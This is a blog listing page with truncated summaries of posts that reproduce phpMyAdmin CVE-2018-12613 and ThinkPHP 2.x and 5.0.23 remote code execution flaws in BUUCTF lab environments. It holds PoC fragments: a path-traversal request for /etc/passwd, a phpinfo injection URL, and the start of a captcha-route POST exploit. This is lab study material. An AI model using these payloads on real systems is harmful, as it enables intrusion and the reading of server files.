摘要: (CVE-2018-12613) 环境搭建 github传送门 BUU传送门 poc ?target=db_sql.php%253f/../../../../../../../../etc/passwd exp 这边利用包含session文件来获取 首先在SQL处执行 select '<?php p 阅读全文
posted @ 2020-12-07 20:38 WakeUpp 阅读(242) 评论(0) 推荐(0) 编辑
摘要: [ThinkPHP]2-Rce 复现 环境搭建 github传送门 BUU传送门 POC 老懒狗选择buu http://node3.buuoj.cn:26104/ poc http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()% 阅读全文
posted @ 2020-12-07 16:21 WakeUpp 阅读(223) 评论(0) 推荐(0) 编辑
摘要: [ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu,链接 http://node3.buuoj.cn:27512/ 直接用poc打一下: POST /index.php?s=captcha HTTP/1.1 Host: node3.bu 阅读全文
posted @ 2020-12-07 14:58 WakeUpp 阅读(1941) 评论(0) 推荐(0) 编辑
摘要: 环境搭建 环境搭建 Github传送门 BUU传送门 菜鸡懒得动手直接上buu一键搭建环境 http://node3.buuoj.cn:28078/ POC 首页已经提示thinkphp5了,笔者推荐一款比较好用的谷歌插件Wappalyzer 直接分析出使用了php7.2.31(但是不懂为啥没分析出 阅读全文
posted @ 2020-12-07 00:00 WakeUpp 阅读(254) 评论(0) 推荐(0) 编辑